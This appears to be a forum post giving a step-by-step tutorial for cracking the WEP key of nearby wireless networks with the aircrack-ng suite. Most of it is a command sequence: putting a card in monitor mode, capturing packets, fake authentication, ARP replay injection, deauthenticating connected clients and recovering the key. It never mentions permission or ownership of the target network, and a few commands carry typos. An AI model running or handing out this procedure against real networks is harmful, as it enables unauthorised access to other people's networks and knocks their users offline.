(adsbygoogle = window.adsbygoogle || []).push({}); Ok so i said i was'nt going to write a tutorial but after helping someone out last night through pm's i thought it would be easier if i did. However i will only how you the method of cracking i wont tell you how to get in silently and do anything. This will also only cover WEP and not WPA-TKIP as even though they are the same method with slight changes to the commands. It will only give you the way to do it using only one wireless nic/dongle/phone/etc and a select set of commands that will get you there if you have patience, there are many more commands and variations i have used 2 or 3 nics at the same time and got things cracked in about 5 mins, but that's an advanced way to do things so ill keep it simple.


Ok so firstly there are a few pre-requests.

1. have a means of using wireless it would be pointless without. This can be anything laptop next would be a wireless dongle then some phones which you can root (generally iphone, android phones[havnt tried these yet though]) will work but wont support injection (i will explain this later)

2. have a linux distro if you dont have one get one easiest to work with is ubuntu. You can vurn the distro to disc and create a live cd but everytime you boot you'll have to re install everything or you can put it onto a usb stick using this program found You must login or register to view this content..

Or you can jsut install to the hdd.

OK so now that is all set up then we need to boot into our new linux and hit alt+f2 and type

sudo apt-get update && sudo apt-get install aircrack-ng

and tick the run in terminal box.

Once this is done we will see if you wireless card is supported by this suite so open up a terminal --alt+f2 gnome-terminal.

1. sudo airmon-ng this

this will set your card into monitoring mode

2. sudo airodump-ng --write (nameofyourfile) mon0

this should start to show the networks that your card can see and capture data packets if there is any traffic and the connected wireless clients .

3. Once you have located a access point using wep we need to see if it is using mac filtering or not so open up another terminal and type in the following

sudo aireplay -1 0 -a [ Bssid of the AP] –b [ bssid of the AP] –h [ bssid of the client ] [ interface ]

so this would look some thing like for me

sudo aireplay -1 0 -a 00:00:00:00:00:00 -b 00:00:00:00:00:00 -h 11:11:11:11:11:11 mon0

and you will see

Sending authentication request
Autentication Succesful
Sending association request
accositaion successful

if we get source mac address rejected then we will need to locate a clients mac associated with the access point from the client list.

It is a good idea to go for a access point a few clients for the next part anyway.

im asuming it was succesful

4. Packet injection is key as this will help generate traffic and capture your data a lot faster however this will be the downfall for some as it may not be supported by the device your using because of its chipset. find a client in the list from airodump.

type in -- sudo aireplay-ng -3 -a[bssid mac] -b[bssid mac] -h [client mac] -x 200 -r (whateverthenameofthefileisthatyounamedforAIRODUMP-01.cap) mon0

we the wait for it to start sending packets . If this doesnt seem to be doing anything after about 5mins you can use the following command to get the ap and client to deauth each other and send arp requests in another terminal

sudo aireplay-ng --deauth 10 -a [bssid] -c [client ssid] mon0

ok so sit back and watch you airodump box and it should be capturing data packets now and if done right shouldnt take to long to get to 80k.you can start this command at anytime during the capturing process as it will restart at a defined amount of packets and you can set it and forget it

5. aircrack-ng this is where your hardwork will pay off .you can start this command at anytime during the capturing process as it will restart at a defined amount of packets and you can set it and forget it

in terminal -- sudo aircrack-ng (whateverthenameofyourfileis-01.cap)

then find you target access point with the associated number. it will the proceed to tell you if it can find it or it needs more packets.

once you have got the key type in sudo airmon-ng wlan0 stop and close your terminals after writing down the keys you have obtained.

Congratulations you have cracked wep. If it didn't work the first time try again.

See told you it was easy.

please thank and rep it took ages to write this